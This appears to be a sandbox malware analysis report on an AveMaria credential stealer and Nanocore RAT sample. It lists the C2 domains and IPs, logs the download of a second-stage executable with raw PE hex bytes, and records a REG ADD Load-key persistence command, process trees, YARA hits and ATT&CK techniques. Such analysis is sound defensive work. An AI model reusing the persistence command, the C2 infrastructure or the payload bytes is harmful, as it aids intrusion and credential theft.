Aug 2, 2021 10:19:01.357726097 CEST	192.168.2.3	8.8.8.8	0x87e9	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)
Aug 2, 2021 10:19:08.561073065 CEST	192.168.2.3	8.8.8.8	0xc1bd	Standard query (0)	hhjhtggfr.duckdns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 2, 2021 10:17:46.556118965 CEST	8.8.8.8	192.168.2.3	0x571d	No error (0)	sdafsdffssffs.ydns.eu	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:17:47.547542095 CEST	8.8.8.8	192.168.2.3	0x1584	No error (0)	hutyrtit.ydns.eu	203.159.80.165	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:17.547638893 CEST	8.8.8.8	192.168.2.3	0xd5ab	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:24.032999039 CEST	8.8.8.8	192.168.2.3	0x2bd8	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:30.047801971 CEST	8.8.8.8	192.168.2.3	0x8265	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:36.327006102 CEST	8.8.8.8	192.168.2.3	0x126c	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:43.096067905 CEST	8.8.8.8	192.168.2.3	0xb4f	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:49.273305893 CEST	8.8.8.8	192.168.2.3	0xecfa	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:18:54.266047955 CEST	8.8.8.8	192.168.2.3	0xca75	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:19:01.393486023 CEST	8.8.8.8	192.168.2.3	0x87e9	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)
Aug 2, 2021 10:19:08.594361067 CEST	8.8.8.8	192.168.2.3	0xc1bd	No error (0)	hhjhtggfr.duckdns.org	203.159.80.186	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

hutyrtit.ydns.eu

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49730	203.159.80.165	80	C:\ProgramData\images.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 10:17:47.600322962 CEST	1618	OUT	GET /microC.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: hutyrtit.ydns.eu Connection: Keep-Alive
Aug 2, 2021 10:17:47.632756948 CEST	1619	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 02 Aug 2021 07:13:53 GMT Accept-Ranges: bytes ETag: "382415f36d87d71:0" Server: Microsoft-IIS/8.5 Date: Mon, 02 Aug 2021 08:17:47 GMT Content-Length: 1378816 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 31 9b 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2e 14 00 00 da 00 00 00 00 00 00 06 4c 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 4b 14 00 4f 00 00 00 00 60 14 00 20 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2c 14 00 00 20 00 00 00 2e 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 d6 00 00 00 60 14 00 00 d8 00 00 00 30 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 08 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 4b 14 00 00 00 00 00 48 00 00 00 02 00 05 00 90 30 01 00 64 ab 02 00 03 00 00 00 73 01 00 06 f4 db 03 00 c0 6f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1d 00 00 0a 2a 26 00 02 28 1e 00 00 0a 00 2a ce 73 1f 00 00 0a 80 01 00 00 04 73 20 00 00 0a 80 02 00 00 04 73 21 00 00 0a 80 03 00 00 04 73 22 00 00 0a 80 04 00 00 04 73 23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(&(ss s!s"s#0~o$+0~o%+0~o&+0~o'+0~o(+0<~(),!rp(o+s,~+0~+"0&(r1p~o-(.t$+0&(r7p~o-(.t$+0&(r?p~o-(.t$+*0&(rEp~o-

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: Xjf4yH9N2t.exe PID: 1048 Parent PID: 5604

General

Start time:	10:16:58
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Xjf4yH9N2t.exe'
Imagebase:	0x970000
File size:	1309184 bytes
MD5 hash:	2318B60075E442CB6141535E268E4DF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: Xjf4yH9N2t.exe PID: 3468 Parent PID: 1048

General

Start time:	10:17:16
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Imagebase:	0x80000
File size:	1309184 bytes
MD5 hash:	2318B60075E442CB6141535E268E4DF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: Xjf4yH9N2t.exe PID: 4092 Parent PID: 1048

General

Start time:	10:17:17
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Imagebase:	0xf0000
File size:	1309184 bytes
MD5 hash:	2318B60075E442CB6141535E268E4DF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: Xjf4yH9N2t.exe PID: 1380 Parent PID: 1048

General

Start time:	10:17:17
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Xjf4yH9N2t.exe
Imagebase:	0x760000
File size:	1309184 bytes
MD5 hash:	2318B60075E442CB6141535E268E4DF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248801127.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248863856.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000007.00000002.251556830.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248772250.0000000000FD5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000007.00000003.248878230.0000000000FD9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: cmd.exe PID: 5376 Parent PID: 1380

General

Start time:	10:17:20
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: images.exe PID: 2100 Parent PID: 1380

General

Start time:	10:17:20
Start date:	02/08/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0xb30000
File size:	1309184 bytes
MD5 hash:	2318B60075E442CB6141535E268E4DF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 20%, ReversingLabs
Reputation:	low

Analysis Process: conhost.exe PID: 5380 Parent PID: 5376

General

Start time:	10:17:20
Start date:	02/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: reg.exe PID: 4600 Parent PID: 5376

General

Start time:	10:17:21
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Imagebase:	0xdd0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: images.exe PID: 2044 Parent PID: 2100

General

Start time:	10:17:39
Start date:	02/08/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0x5a0000
File size:	1309184 bytes
MD5 hash:	2318B60075E442CB6141535E268E4DF0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000003.295384673.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000003.295297154.0000000000E24000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000003.295398863.0000000000E28000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000016.00000002.472129392.0000000000400000.00000040.00000001.sdmp, Author: unknown
Reputation:	low

Analysis Process: cmd.exe PID: 5716 Parent PID: 2044

General

Start time:	10:17:41
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5524 Parent PID: 5716

General

Start time:	10:17:42
Start date:	02/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: KetqqsbuJ.exe PID: 380 Parent PID: 2044

General

Start time:	10:17:49
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\KetqqsbuJ.exe'
Imagebase:	0xa30000
File size:	1378816 bytes
MD5 hash:	8FA8F52DFC55D341300EFF8E4C44BA33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 20%, ReversingLabs
Reputation:	low

Analysis Process: rdpvideominiport.sys PID: 4 Parent PID: -1

General

Start time:	10:17:55
Start date:	02/08/2021
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff7488e0000
File size:	30616 bytes
MD5 hash:	0600DF60EF88FD10663EC84709E5E245
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: rdpdr.sys PID: 4 Parent PID: -1

General

Start time:	10:17:56
Start date:	02/08/2021
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	182784 bytes
MD5 hash:	52A6CC99F5934CFAE88353C47B6193E7
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: tsusbhub.sys PID: 4 Parent PID: -1

General

Start time:	10:17:57
Start date:	02/08/2021
Path:	C:\Windows\system32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	126464 bytes
MD5 hash:	3A84A09CBC42148A0C7D00B3E82517F1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: KetqqsbuJ.exe PID: 5916 Parent PID: 380

General

Start time:	10:18:13
Start date:	02/08/2021
Path:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\KetqqsbuJ.exe
Imagebase:	0x4f0000
File size:	1378816 bytes
MD5 hash:	8FA8F52DFC55D341300EFF8E4C44BA33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483249527.0000000006C70000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483194992.0000000006C40000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483125552.0000000006C10000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482686729.00000000060A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482161790.0000000005280000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483106332.0000000006C00000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483164345.0000000006C30000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.476683090.0000000002CA1000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483052985.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483212056.0000000006C50000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000028.00000002.480758507.0000000003F8D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482070499.0000000005160000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000028.00000002.477157085.0000000002D0B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: dhcpmon.exe PID: 2296 Parent PID: 3388

General

Start time:	10:18:28
Start date:	02/08/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0xca0000
File size:	1378816 bytes
MD5 hash:	8FA8F52DFC55D341300EFF8E4C44BA33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 20%, ReversingLabs
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
